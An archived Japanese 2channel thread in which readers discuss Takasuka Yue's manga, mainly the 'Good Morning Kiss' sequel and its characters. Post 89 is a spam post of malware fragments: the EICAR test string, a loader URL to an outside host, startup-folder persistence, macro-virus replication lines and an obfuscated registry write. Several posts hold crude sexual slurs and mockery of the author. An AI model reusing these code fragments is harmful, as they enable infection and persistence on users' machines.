2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【マターリ】高須賀由枝2【スフレ】

1 :花と名無しさん:2006/08/18(金) 11:38:20 ID:???0
前スレ落ちたので立てました。

前スレ
【ギャグオチでも】高須賀由枝1【いいじゃないか】
http://comic6.2ch.net/test/read.cgi/gcomic/1054373109/

公式HP「irochigai」
ttp://irochigai.chips.jp/

2 ::2006/08/18(金) 11:40:28 ID:???0
スレタイは前スレで出ていた案を使わせてもらいました。

3 ::2006/08/18(金) 11:44:14 ID:???0
最新情報

クッキーBOXで「グッドモーニング・コール」の続編
「グッドモーニング・キス」掲載中。

4 :花と名無しさん:2006/08/18(金) 12:30:56 ID:???O
>>1さん、乙華麗です。
昨日覗きに来たら落ちててびっくり。
次は最後まで行けたらいいですね。

5 :花と名無しさん:2006/08/18(金) 16:30:39 ID:???0
>>1 乙です!
スレタイいいね。高須賀さんにぴったり>スフレ

6 :花と名無しさん:2006/08/19(土) 00:56:05 ID:???0
ここは平和ですね(^^ω)


7 :花と名無しさん:2006/08/19(土) 20:11:02 ID:???O
落ちないようにあげます

8 :花と名無しさん:2006/08/19(土) 21:41:58 ID:???0
保守
早くクッキーbox出ないかな

9 :花と名無しさん:2006/08/19(土) 23:20:58 ID:???O
次のクッキーBOXかなり楽しみ。
結婚するまでの話かな?

10 :花と名無しさん:2006/08/20(日) 12:30:55 ID:???0
やっぱりこの人の絵いいね
小学生のとき
りぼんからグッモニだけ切り離して集めてた(単行本買えないのでw


11 :花と名無しさん:2006/08/20(日) 15:02:31 ID:???0
次に載るクッキーBOXていつ発売?

12 :花と名無しさん:2006/08/20(日) 16:43:31 ID:???0
>>10
泣かせるんじゃねーよバカヤロ・゚・(ノД`)・゚・

13 :花と名無しさん:2006/08/20(日) 16:53:42 ID:???O
>>11
9/8頃じゃなかったかな?
間違ってたらスマソ。

14 :花と名無しさん:2006/08/20(日) 23:01:39 ID:???O
>>11初夏号みてみたら
次のクッキーBOXは2006年9月上旬の発売予定です
って書いてました。
楽しみですね。

15 :花と名無しさん:2006/08/20(日) 23:21:02 ID:IBqeAJWk0
グッドモーニングコール、最近買いなおして読んでる者です。

キスの存在を今日知ったんですが、6月ぐらいに出てたクッキーって
古本屋とかで売ってんのかな。

バックナンバー注文するのもめんどうなんですが売ってるの見かけたことありますか?

16 :花と名無しさん:2006/08/20(日) 23:25:08 ID:???O
ブクオフは読み切りの雑誌買い取りしてるから
売ってる人がいれば売ってるんじゃないかな?

次のBOXは来月だから、まだ普通に書店で売ってそうだけどなかった?

17 :花と名無しさん:2006/08/21(月) 15:47:53 ID:LPJlS3eL0
失礼、勘違いしていたようです。
月刊誌のクッキーじゃなくて、クッキーBOXとよばれるやつだったんですね。

だから6月に発売された奴が書店に残ってると。 
いまから本屋に探しに行ってみます。

18 :花と名無しさん:2006/08/21(月) 17:35:18 ID:LPJlS3eL0
ふむ、5箇所ぐらい本屋まわったんですけど置いてないっぽいですね。

発売後3ヶ月近く経っちゃうとあんまり本屋には置かないものなんですかね。

みなさんの地元の本屋には売ってますか?

19 :花と名無しさん:2006/08/21(月) 18:22:10 ID:???O
この前、一冊だけコンビニで残ってたよ

コンビニも行ってみたらどうかな

20 :花と名無しさん:2006/08/22(火) 00:25:55 ID:???O
うちは田舎だからまだ残ってると思う。


お店の人に取り寄せてもらったらどうかな?

21 :花と名無しさん:2006/08/22(火) 12:41:35 ID:RTaCCcu20
わざわざありがとうございます。

コンビニもちょくちょく探してるんですけど見つからないですね。

近くの本屋で注文を頼もうと思ったら、集英社は在庫を残さないから無理
みたいなこと言われたのであるとこ探すしかないと思ってます。

まんだらけでも行ってみますかね。

22 :花と名無しさん:2006/08/22(火) 20:00:14 ID:RTaCCcu20
渋谷の本屋で注文できました^^


23 :花と名無しさん:2006/08/22(火) 20:42:40 ID:???O
よかったね

24 :花と名無しさん:2006/08/23(水) 12:31:08 ID:paUrfK8B0
ふむ、やっぱ在庫無いって言われました;;
初夏号は読み飛ばして9月に出るやつだけ読むことにします。

ヤフオク探しても無かったし;;

25 :花と名無しさん:2006/08/23(水) 20:56:53 ID:???O
モバオクには一冊出品されてたよ

http://mbok.jp/.m26181c.ZLAGYOQ8S4/

26 :花と名無しさん:2006/08/23(水) 21:38:49 ID:Ki4YvisDO
落ち着いてみなされ。
そこまでして読みたいかい?
そのうち単行本になるだろうに。
あと少しで次のボックスもでるし。

27 :花と名無しさん:2006/08/24(木) 14:51:22 ID:???O
勘違いで重複スレ立てちゃった人がいるみたいだが、
あちらの作品リストはよく出来てるな〜とチョト感心したw

28 :花と名無しさん:2006/08/24(木) 20:48:02 ID:???0
>>1>>4
亀レスですが、980を超えたら24時間以内にレスがないと
自動的に落ちます。←これはホントに。
また980を超えたら、ちゃんと倉庫に収納されるんじゃ
なかったかと…(記憶違いだったらスマソ)。


29 :花と名無しさん:2006/08/25(金) 07:43:39 ID:???0
>>27
コミックス
 STUDY
 シュガーポット 1〜3巻
 桜ヶ丘エンジェルズ 全2巻
 グッドモーニング・コール 全11巻
 お日様カンパニー(前)(後)
 上を向いて歩こう!(前)(後)
 パレードしようよ!(前)(後)
 とまどいの姫君
 恋も2度目なら

30 :花と名無しさん:2006/08/26(土) 22:50:13 ID:???0
クッキーBOX、9月8日発売だって。

31 :花と名無しさん:2006/08/27(日) 08:41:30 ID:???O
>>30ありがd。
楽しみだなあ。

32 :花と名無しさん:2006/08/27(日) 09:58:25 ID:???0
HPに書いてあった「ニヤリとしてもらえるようなネタが満載」って
どんなのだろう?

33 :レイ・ザ・ナツキ:2006/08/27(日) 10:22:43 ID:uz5pz67v0
なつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつきなつき

34 :花と名無しさん:2006/08/27(日) 18:00:49 ID:XIpWYspQO
なつきってなんですか?

35 :花と名無しさん:2006/08/27(日) 18:05:13 ID:???O
>>34
マルチコピーだから、気にしないでいいとオモ。

36 :花と名無しさん:2006/08/31(木) 15:15:02 ID:???0
ホシュ

37 :花と名無しさん:2006/08/31(木) 18:02:29 ID:???0
スフレって何?セフレかと一瞬オモタ

38 :花と名無しさん:2006/08/31(木) 18:34:09 ID:???0
スフレうまー
http://images.google.co.jp/images?q=%E3%82%B9%E3%83%95%E3%83%AC&hl=ja

39 :花と名無しさん:2006/09/03(日) 00:17:12 ID:kB5sAoV7O
グッド、文庫か完全版出ないかな。この機会に

40 :花と名無しさん:2006/09/04(月) 22:10:48 ID:???0
完全版出て欲しいー。

41 :花と名無しさん:2006/09/06(水) 07:32:18 ID:CsWTPxld0
確かに、カラーの絵が見たい。

42 :花と名無しさん:2006/09/06(水) 13:09:51 ID:???O
画集も出て欲しい

43 :花と名無しさん:2006/09/06(水) 16:45:38 ID:???0
出るとしたらグドキス発売に合わせるんじゃないかな?
もうちょっと先になりそう。
早くて1年後とか。

44 :花と名無しさん:2006/09/06(水) 18:10:18 ID:???0
いいねーグッモニの頃のカラーまた見たい。
リアの頃カラー扉集めていたけど捨ててしまい後悔…

もうすぐCookiebox発売だ。

45 :花と名無しさん:2006/09/07(木) 01:38:03 ID:???0
>>44
また載るの?連載??
どうでもいい話だけど高校生編ではあの2人ヤッてない設定だったよね?
まさかとは思うけど未だにその設定を引きずる気なのかな?

46 :花と名無しさん:2006/09/08(金) 19:23:35 ID:kEpX6b9/O
クッキーbox読んだ
やっぱり奈緒のグダグダ感はちょっとイライラする…
でも、相変わらずの甘いシーンでのギャグ落ちは良かったww
この漫画やっぱり好きだわ
コミクス出たら買うと思う

47 :花と名無しさん:2006/09/08(金) 21:48:12 ID:???0
BOX読んできた。
この人の描く漫画は変わらないなー…相変わらずほのぼのとして。
やっぱりあのぬるい感じがいいなーと思った。
自分もコミックス出たら絶対買っちゃうと思う。
これで終わり…ではないよね?なんかこのまま連載になりそうな感じなんだけど。

>>45
今回多分もうヤッてる設定になってたと思う。
最後そんな感じで終わったし。
さすがにもう大学生だからね

48 :花と名無しさん:2006/09/08(金) 22:59:10 ID:pwAf2ye30
>>45
いや、 ヤッてるとは、断定できない。
ヤッてないとも、断定できない。
決定的なセリフみたいなものは今のところない。

49 :花と名無しさん:2006/09/09(土) 00:02:35 ID:???O
自分が読んだ限りでは、ヤってると思った。
けどかなり微妙だから読む人によるよ。

50 :花と名無しさん:2006/09/09(土) 08:53:18 ID:2yFngq4d0
>>45
表誌にシリーズとあるから

51 :花と名無しさん:2006/09/09(土) 21:44:02 ID:???O
今クッキーボックス読み終えたよ。
菜緒と上原、最後見る限り日常的にやってる感じだね orz
あんなボケボケしてるくせにちゃっかりやることやってる菜緒って…
実際にいたら嫌なタイプだ

52 :花と名無しさん:2006/09/09(土) 22:14:59 ID:???O
3年間半同棲しててやってなかったらそっちがびっくりだ。
自分、コールの8巻で「まだ」と判明して本気で驚いた覚えある。



53 :花と名無しさん:2006/09/09(土) 22:49:22 ID:???0
ぼけぼけしてはいるけど、ブリッコ系とかではないから
まぁ許せる範囲かな。
60ページもあるんだよね?60Pも立ち読みしづらいな。
値段よりあの厚さが買うのをためらわれる。


54 :花と名無しさん:2006/09/10(日) 00:33:51 ID:???O
コンビニで60ページ堂々と立ち読みしました・・・
飲み物買って出たから許してくれるかなーなんて

55 :花と名無しさん:2006/09/10(日) 00:38:13 ID:???0
>>54
十分だよ
私なんか10回に9回は普通に立ち読みして帰ってるw

56 :花と名無しさん:2006/09/10(日) 01:20:21 ID:???0
内容は60Pぎっしりつまってる感じでしたか?
やっぱりギャグ顔多めなのかな。
早く単行本になってくれるといいな。

57 :花と名無しさん:2006/09/10(日) 04:54:50 ID:???0
これ結婚式まで連載続くのかな?
親に挨拶なんて話題になっても菜緒の母親や上原兄
(未成年で両親がいない場合って、別の保護者の承諾がいるんじゃないの?)
の顔が出てこない辺り、最後まで出さないような気がして。

58 :花と名無しさん:2006/09/10(日) 09:27:08 ID:???0
まりなの「人生苦労せずに幸せになってナンボ」って考え方は
漫画のキャラとして好きじゃないなあ。
「卒業後に結婚すれば就職活動しなくていい=専業主婦」がデフォだったり、
子供は欲しくないと言い切ったり。

菜緒も菜緒で自分のワガママで中学生の頃から独り暮らしさせてもらってるのに、
大学生になっても生活費を親に全額負担してもらうのが当たり前だと思ってるし。
この二人って将来の夢とかも何にも考えてなくて、
単に少しでも長く遊ぶ為だけに大学進学したみたいだよね…。

59 :花と名無しさん:2006/09/10(日) 11:01:31 ID:???O
>>58
そうか?その考え方はリアルだと思うけど。
むしろあなたの方が理想持ちすぎなんじゃないの?
おいくつなのか知らないけど中学生か高校生くらい?

60 :花と名無しさん:2006/09/10(日) 11:24:21 ID:???0
いや、逆にリアルを知ってるし自分もそういう考えが分かるからこそ、
漫画の中だけでも理想を持ちたいってだけなんだけど。
特に菜緒なんてほわわんとしててずる賢さとは無縁っぽいのだから、
そういう所は要領の悪い努力家ってキャラの方がいいなって。
初期のままなら、多少ちゃっかりしてて要領が良くても違和感ないのだけど。

61 :花と名無しさん:2006/09/10(日) 14:12:15 ID:???O
>>58
まりなは羨ましくて
いじめちゃっただけでしょう。

62 :花と名無しさん:2006/09/10(日) 16:53:00 ID:???0
>>61
でも結婚はまだしたくない、せっかく大学生になったのだから遊びたいとか、
子供が嫌いだからいらないってのは本音なんじゃない?
菜緒が大事だからこそ、離れて行かれるのが寂しくて
つい意地悪しちゃったって所は可愛いけどね。

63 :花と名無しさん:2006/09/10(日) 17:30:54 ID:???0
>>62
同意。
それより私は太田ちゃんが目の前にいるにも関わらず
「遊ぶ相手がいなくなっちゃうじゃ〜ん!」って言っちゃうまりなが
引っかかった。
太田ちゃんそういうの気にせずフォローまでしてくれる子だからよかったけど。
あれは言われたらちょっとショックじゃない?
細かいツッコミでスマソ。

64 :花と名無しさん:2006/09/10(日) 17:50:01 ID:???0
>>63
それも同意。
まあ菜緒とは中学時代からの古い付き合いだし、
大学からの太田ちゃんとはまた違うのだろうけど、
それを本人の前で言うのはデリカシーないなと。
まりなもそれはさすがにマズイと思ったのか、
天然で何も気にしてなかったのかは分からないけど、
その太田ちゃんの優しさは素直に受け取ってたね。

65 :花と名無しさん:2006/09/10(日) 18:01:13 ID:???0
でもまりなのキャラってすごいリアルな気がする。


66 :花と名無しさん:2006/09/10(日) 18:12:43 ID:???O
自演がいますね

67 :花と名無しさん:2006/09/10(日) 21:22:22 ID:???O
>>66別に荒らしてるわけでもないし
証拠もないし、いいんでないかい?

68 :花と名無しさん:2006/09/11(月) 07:15:29 ID:???O
自演なんて今に始まったことじゃないでしょ、こんな過疎スレで。

69 :花と名無しさん:2006/09/11(月) 20:48:03 ID:???0
「非現実主義」の菜緒、「現実主義」のまりなで丁度いいバランス取れてるんじゃ?
でも、グッモニは設定からして非現実的だからナー…

70 :花と名無しさん:2006/09/11(月) 23:44:11 ID:???O
正直続編はやらない方が良かったんじゃないかな・・・。
菜緒が地味に嫌な女すぎる、大学生にもなってあれじゃあw
無理だろうけど、今からでもコール初期の
チャキチャキした菜緒にシフトしていってほしい。

71 :花と名無しさん:2006/09/12(火) 04:15:48 ID:???O
コールも5巻くらいで終わっとけば良かったんだよ。
あんな馬鹿みたいにグダグダ続けたくせに唐突に終わって続編描くなんて虫が良すぎ。

72 :花と名無しさん:2006/09/12(火) 15:21:05 ID:???0
最近のこの人の漫画は読んでないから知らんけど、95年前後はどの作品もサブキャラの男がモテモテの設定で
子供ながら「またかよ・・・」と呆れたのを覚えてる。

作者の理想のタイプも「高学歴でかっこよくてお金持ちな人★」みたいにバカ丸出しな
発言してて、コイツ理想だけが先走ってて絶対まともな恋愛したことないなって思った。

コイツの生活干からびてそうだな

73 :花と名無しさん:2006/09/12(火) 19:39:50 ID:???O
やっと今読んできた〜。あのほのぼのさが好きだな。

一ヵ所菜緒が奈緒になってて、見つけたときおっ!?って思ってしまった

74 :花と名無しさん:2006/09/12(火) 22:07:35 ID:???O
グッドモーニングコール連載時は天然キャラとか癒し系ブームだったけど
今は男ですら天然嫌がるからねー。

菜緒のキャラに魅力感じない以上キスの連載も短そう。

75 :花と名無しさん:2006/09/13(水) 08:03:50 ID:???0
でもコール連載時はあの菜緒の天然がいいとか、
ドロドロの展開にはしないでくれって意見が多くて、
キス読者もそういう人たちが大半だと思うのだけど。

やっぱり感覚が変わって昔は菜緒好きでも今はウザイって人も結構いるのかな?
自分は当時からちょいウザだけど、嫌いってほどでもないから読んでるけど、
確かにもう大学生なのだから、少しは成長して現実的になって欲しいよね。
長い付き合いなのに、上原が特別な事情抱えてるのもほとんど意識してないし。

76 :花と名無しさん:2006/09/13(水) 12:14:43 ID:???O
キスから菜緒の性格が変わったら変わったで反対意見でそう。
私は今の菜緒でいいと思う。
これから成長していく過程が見られるだろうし。

77 :花と名無しさん:2006/09/13(水) 15:00:22 ID:???0
コールの初期、中期あたりは憎めない天然ボケって感じでまだよかったけど
後期は天然無神経って感じがたまにする。
コール以降の天然主人公たちも。

読切で良いから一回「上を向いて歩こう」みたいな気が強いタイプの
女の子で描いてみてほしいな。

78 :花と名無しさん:2006/09/13(水) 20:26:06 ID:???0
菜緒ってニコニコ笑いながら人の悩みやグチを聞いてるより、
怒ったり文句言ったり泣きそうな顔で落ち込んでるイメージの方が強いから、
癒し系の天然って感じじゃないんだよね。
で、ニコニコしてるのは現実離れした妄想してる時が多いから余計イラつく。

多分上原が菜緒を好きなのって自分と正反対のタイプだからってのもあるんだろうけど、
癒されるよりイライラさせられる方のが圧倒的に多い気が。
それともそんな菜緒に大声で怒るのがストレス解消になって快感とか?

79 :花と名無しさん:2006/09/14(木) 00:23:26 ID:???O
菜緒ウザー まりなの方がまだ好感持てる。好きではない。

「菜緒ちゃん可愛い☆」とか言ってるのは恋に恋する厨ばっかりじゃない?
コール連載をりぼんで見てた人は菜緒に違和感感じざるをえない。
こっちが成長したからかもしれないけどさ、あんな女痛杉。

作者はババァのくせにズレとか感じないのかね。

80 :花と名無しさん:2006/09/14(木) 07:50:35 ID:???0
別にファンタジーだから、夢見てて良いよ。

81 :花と名無しさん:2006/09/14(木) 08:47:16 ID:???0
コールって設定は良かったと思うんだよね。
遠い存在だった学園のアイドルと突然同居なんて、リアの憧れだろうし。

ただ、だったら意識したり好きになるのは結構早い段階でもいいけど、
本人同士はそれに気付くか気づかない位の微妙な関係で引っ張って、
読者にもやきもきやドキドキさせて欲しかった。
上原が菜緒を好きだってのも本人にあっさりバレすぎだし唐突だった。

それに実際に付き合ってしまったら同居から同棲になるような物なのに、
雰囲気だけは同居をくずさないようにしてあえてラブラブシーンを避けるから、
結局ダラダラする。

82 :花と名無しさん:2006/09/14(木) 08:52:59 ID:???0
続投ゴメン。
結局、せっかく両思いの彼氏と一緒に住んでるのに、
イチャイチャラブラブはほとんどせず、
単なる飯炊き女(料理は交替制っぽかったけど)みたいだったり、
いつも怒られてケンカばかりの関係を、
当時の読者は本当に羨ましいと思って読んでたのかな?みたいな。

だったら今の「大学生でお隣同士の半同棲」設定の方が羨ましいような。

83 :花と名無しさん:2006/09/14(木) 20:34:55 ID:???0
私は去年まで大学生で、4年付き合ってる彼氏がいるけど、
正直結婚はあんまりしたくない。
子どもも欲しくない。だって、まだ22だし。
やっぱり自分の自由になるお金がある状態は楽しいし。
将来のことを考えてないわけじゃないけど、現実問題今すぐ結婚はムリ!
ちなみに、大学時代に周りにいた人には、一人暮らしで全額親持ちの子とか数人いた。
生活費とか気にしなくていいから、めっちゃ服とか買ってたけど
今の大学生って菜緒やまりなに近い子も結構いると思う。
最近の親って過保護だし。

だから、全否定するほどのことじゃないと思った。

超個人的意見でまとまってないし申し訳ないけど、
上のコメント見てちょっとクチをはさんでしまった。
気分悪くしたらスマソ。


84 :花と名無しさん:2006/09/15(金) 01:37:40 ID:???0
>>83
ん?上のコメントの中にも「まりなの意見が大学生の本音だと思う」って
意見の人も結構いたよ?
自分も大学生だけど、夢見すぎてわざわざ在学中に結婚したがる
菜緒みたいな奴って現実には中々いないよな〜、漫画のキャラだからだろ〜とか
思いながら読んだし。

85 :花と名無しさん:2006/09/15(金) 09:30:46 ID:???O
まとめ:菜緒氏ね

86 :花と名無しさん:2006/09/15(金) 12:40:00 ID:HgdQKT+5O
>>85
死んだ後の展開が激しく気になるwww

87 :花と名無しさん:2006/09/15(金) 23:44:45 ID:uVuaPceoO
酷評した意見を編集部に送った。
つかもうグッドモーニングにこだわらなくていいじゃんよ。
新しいシリーズものを見たい。
主人公は大学生〜社会人で

88 :花と名無しさん:2006/09/16(土) 00:09:23 ID:???O
内容うpうp!

89 :<body onload=window()>:2006/09/16(土) 00:21:37 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

90 :花と名無しさん:2006/09/16(土) 01:03:15 ID:???O
あたしは現役大学生だけど、モーニングもキスも好きだけどな。 確に上を向いて歩こうの主人公みたいな性格の話も読んでみたいけど、菜緒はあれはあれでいいと思う。 

あたしの周りも一人暮らし全親持ち多いし、共感はしないけどまりなの意見も妥当だと思う。 

それに友達に3年付き合ってるカップルいるけど、学生結婚したいとか言ってる子もいるし。 

次が楽しみ!

91 :花と名無しさん:2006/09/16(土) 01:32:42 ID:???0
私も大学生で一人暮らし全親持ち、三年付き合ってる彼氏アリだけど
結婚はまだしたくないな・・・・
卒業してすぐならちょっと考えるけど、学生結婚はまずない。
第一親が許さないだろうしね。
菜緒には将来なりたい職業(主婦以外)ないのかな。
あればまた変わると思うんだけど。
専業主婦を一生続けるならあんまり大学行く意味なさそうだしね。
個人的にはダラダラしててたまに菜緒にイライラさせられつつも
時々ラブラブしてるのを読むのが好き。
っていうか、ラブラブしてるのを読むのが楽しみ。
今回はラストばっかり5回くらい読み直したよw
でも、ずっとラブラブしてるのは嫌なんだよなぁ。

92 :花と名無しさん:2006/09/16(土) 22:06:15 ID:???0
キスの菜緒に共感できないのは、コールの延長線でただなんとなく大学に進学して
なんとなく上原と付き合っている感が否めないから。
高校生編が中途半端で終わって、いきなり大学生として物語が始まるので、
高校→大学間特有の生き方とか悩みとかが見えてこないんだよね。
まあ、そこは脳内補完しろってことなのかもしれないけど、菜緒というキャラからは「なんとなく〜」感が抜けなくて嫌。

93 :花と名無しさん:2006/09/17(日) 11:34:41 ID:hVAzlpfFO
菜緒しねや

94 :花と名無しさん:2006/09/17(日) 13:08:30 ID:???O
ガバマン菜緒と結婚する上原哀れ

95 :花と名無しさん:2006/09/17(日) 14:32:42 ID:???0
つ ttp://www.google.co.jp/search?hl=ja&ie=Shift_JIS&q=%E4S%81@%92%F7%82%DC%82%E8%81@%83G%83N%83T%83T%83C%83Y&lr=

上原が巨根だからゆるくなっちゃったんだよ!

96 :花と名無しさん:2006/09/17(日) 15:31:42 ID:???0
なんかどんどん菜緒がウザくなっていく
大学生でこの性格・行動はイタすぎ。
グッモニほのぼのしてて結構好きだったから、嫌いになる前に終わらせてくれ

97 :花と名無しさん:2006/09/18(月) 01:37:25 ID:???O
菜緒もうざいが、沙保も相当うざい。
二人の共通点=被害妄想飯炊き糞ビッチ(おまけ:ガバマン)

30負け犬女と言われる人たちの10代の姿だよw

98 :花と名無しさん:2006/09/18(月) 02:10:06 ID:???O
菜緒きんもー☆

99 :花と名無しさん:2006/09/18(月) 15:57:24 ID:???O
新シリーズで大人の恋を書いてほしいな。
主人公はウザくなく、飯炊き女でもなく、しっかりした子が良い。

100 :花と名無しさん:2006/09/18(月) 20:53:27 ID:???O
ブログのコメントが厨臭すぎる件

101 :花と名無しさん:2006/09/19(火) 19:57:28 ID:???0
>>100
そりゃリア焼酎ばっかりですから

102 :花と名無しさん:2006/09/20(水) 13:04:25 ID:???O
あのブログのコメントは記事に関係ない自分語りと
〆の言葉「長文&乱文失礼しました☆」がデフォw

しかしそんな芋焼酎たちに食わせてもらってるのが高須k(ry
んでその産物が糞ビッチ菜緒w

103 :花と名無しさん:2006/09/22(金) 12:32:29 ID:???0
作者もファンも頭すっからかんだな。


104 :花と名無しさん:2006/09/24(日) 02:42:18 ID:???O
擁護する人が全然出てこないあたり、皆続編をうざがってるんだと分かる

105 :花と名無しさん:2006/09/24(日) 03:29:22 ID:???0
擁護したいけど、基本コミックス派なので今は黙って待ってるだけ

106 :花と名無しさん:2006/09/24(日) 07:13:47 ID:???O
>>105
(^ω^)

107 :花と名無しさん:2006/09/30(土) 19:02:01 ID:???O
上を向いて歩こう読みました。
強気な女の子が主人公って珍しいね。
新鮮に読めました。
当たり前かもだけど、見た目、あつきがひさしでした。

108 :花と名無しさん:2006/09/30(土) 22:33:28 ID:RxAdgwnm0
りぼんで連載してくれればいいのに。

109 :花と名無しさん:2006/10/01(日) 21:35:31 ID:???O
>>108
もういらん

110 :花と名無しさん:2006/10/02(月) 02:45:27 ID:???O
やっぱり痛いな、ブログ。
水玉ってきっと自分で可愛いと思ってんだろうな…。
いい年してあんな水玉だらけでピエロかよww

しかしコメントはどんなことがあっても絶賛の嵐w
ちぃひってHNの付け方がいかにもDQN臭くてキモス

111 :花と名無しさん:2006/10/02(月) 12:32:52 ID:???0
この人って愛媛から全くでて暮らしたとこ無いみたいだね。
ブログ読んでからグッドの続編読むと作品の舞台が全て
愛媛だと思ってしまうよ。

112 :花と名無しさん:2006/10/02(月) 16:20:48 ID:???0
この前見かけたけど普通の白塗りのチビオバチャンだお。

113 :花と名無しさん:2006/10/03(火) 04:05:29 ID:???O
彼女のいえでSTUDYって単行本読ませて貰って結構楽しめたから来てみたら、なんだこの叩かれようw

女性向け漫画なんて萩尾さんとか山岸さんとか今市子さんとかとかの若干大人向けと思われるのしか読んだことなかったから新鮮だったんだけど、少女漫画としちゃアレなんすかね。

短編三つ入っててノリも絵も展開も全部同じやなーってのは感じたけど。
まあそんな感じです

114 :花と名無しさん:2006/10/03(火) 06:18:43 ID:???0
2ちゃんは実際の読者層とは偏りがあるので……

115 :花と名無しさん:2006/10/03(火) 08:58:06 ID:???O
>>114
ニヤニヤ(・∀・)

116 :花と名無しさん:2006/10/03(火) 11:36:29 ID:???0
グッドモーニングコールの中学生編が一番面白かったなあ

117 :花と名無しさん:2006/10/03(火) 15:04:02 ID:???0
>>116
絵もその辺が一番可愛かったと思う。

118 :花と名無しさん:2006/10/03(火) 15:34:45 ID:???O
>>115
釣りのつもりじゃなかったんだから反応したやつからかうのやめれ

119 :花と名無しさん:2006/10/03(火) 16:28:37 ID:???0
>>111
松山って、四国の中では多分一番大きな街だし
そこそこレベルで良ければ学校とか店とか施設揃ってるから、
外に出ないでずーっと住んでる人けっこういると思う。
「作品の舞台は全て愛媛県松山市」だと思って読んでます。

せっかく愛媛育ちなんだから、地域色生かした漫画も描いてみて欲しいが
今の持ち味はオサレ漫画だから無理か…

120 :花と名無しさん:2006/10/03(火) 17:30:09 ID:???O
田舎者がおしゃれなんて笑わせてくれるw

121 :花と名無しさん:2006/10/03(火) 20:09:25 ID:???0
>>119
地域色、とまでは言えないかも知れないけど、たしか、
グッドモーニングコールの後半でみんなで温泉旅館に泊まりに行ってたじゃん
ああいう、市街の中心部と山中の温泉との距離が近いのは松山市っぽいな、と思って読んでたよ

122 :花と名無しさん:2006/10/04(水) 21:56:56 ID:???0
誰か高須賀の写真持ってない?
あったらうpしてほしい!見てみたいな・・・

123 :花と名無しさん:2006/10/05(木) 12:51:17 ID:???0
>>121
市街中心部から10分で、海にも空港にも温泉にも行けるもんねぇ。
思い切って作品の中で路面電車でも走らせてみたら面白いかも…

124 :花と名無しさん:2006/10/07(土) 08:54:17 ID:???0
>>119
でもこの人
高島屋の通販にはまってた時
名古屋でのサイン会の合間に
「高島屋逝かせろ!愛媛には高島屋ないんだ!」なんて
わめいてたそうですからねえ(藁)
(伊予鉄松山市駅の駅ビルのテナントがそごうだった頃の話、
ちなみに現在のテナントはよりによってその高島屋だったりする)
>>121
札幌市もそうだったりするんじゃなかったっけ?
(定山渓温泉があったりする)
>>123
奴だったら無理して地下鉄走らすぞw

125 :花と名無しさん:2006/10/07(土) 10:56:20 ID:???O
>>124
ババアのくせに田舎者丸出しDQN…高須賀婆キモス。
確かコミックスのおまけかなんかで「お願いして時間作ってもらいました><☆」
みたいなことキャピって描いてたけど、周りからしたらただのDQN我儘だって分かんないのかね?

しかもその時買ったのがセールで特売してた水玉のハンカチ色違いで何枚もって…。
本当にピエロでワロタwww
特売水玉ハンカチを毎日色違いで首に巻いてルンルン♪めでたい高須賀婆w

126 :261:2006/10/07(土) 18:21:47 ID:???0
今グッドモーニング読んでるけど2頭身でかくことがメチャクチャ多いな。
阿部っちなんて90%以上2頭身だろ。まぁいいけど。

127 :花と名無しさん:2006/10/08(日) 14:01:29 ID:???0
お年寄りが全員ニ頭身なのは・・・・
年寄り描けないのかな

128 :花と名無しさん:2006/10/08(日) 20:49:40 ID:???O
この人、食べ物の絵が上手だね。
ケーキ食べたくなる。

129 :花と名無しさん:2006/10/08(日) 21:35:03 ID:???O
シュガーポット2巻の裏表紙には
シュガーポット全2巻
とかいてますが、全3巻ですよね?
2巻で終わらせるつもりだったのでしょうか?

130 :花と名無しさん:2006/10/08(日) 21:36:55 ID:???O
3巻に書いてある

131 :花と名無しさん:2006/10/08(日) 21:46:42 ID:???O
知りませんでした。
ありがとうございました。

132 :130:2006/10/08(日) 21:59:20 ID:???O
ごめん間違えてた、書いてあるのはSTUDYだった

133 :126:2006/10/09(月) 06:17:01 ID:???0
たった今グッド全巻読み終わった。すごいいい作品だったんだけどいくつか不満が。
まず1番は卓也が登場しなかったこと。不思議でしょうがない。久志よりカッコイイ
キャラを描けなかったから?あと最終話にゆりりんやみっちゃんが出なかったこと。
みっちゃんはいいとしてもゆりりんだせよ!!一番好きだったのに。
あとは北浦とすぎのうちさんが何にもなかったことや北浦のいとことその彼の問題など
消化不良な点がいくつかあったことかな。
個人的にツボだったのがもやしっ子ネタww自分ももやしっていうのもあるけど、筋力増強
マシンとか・・・分かるよあの気持ちは。ところで女としてはもやしでも顔がよければいいもん?

134 :花と名無しさん:2006/10/09(月) 13:41:04 ID:???O
もやしはエチの時に骨が当たって痛いからやだ。
久志くらい顔がいい男なら許せるけどw

135 :花と名無しさん:2006/10/09(月) 15:39:16 ID:???0
なるほど。しかし久志は別に他のキャラと体格同じに見えるけどな。
顔なんて千崎弟とそっくりだ。それが少女漫画ってもんか。
ところでこのスレを見るとグッドモーニングキスは1話60ページくらい
あるみたいだけどコミックはいつ頃になるかな?

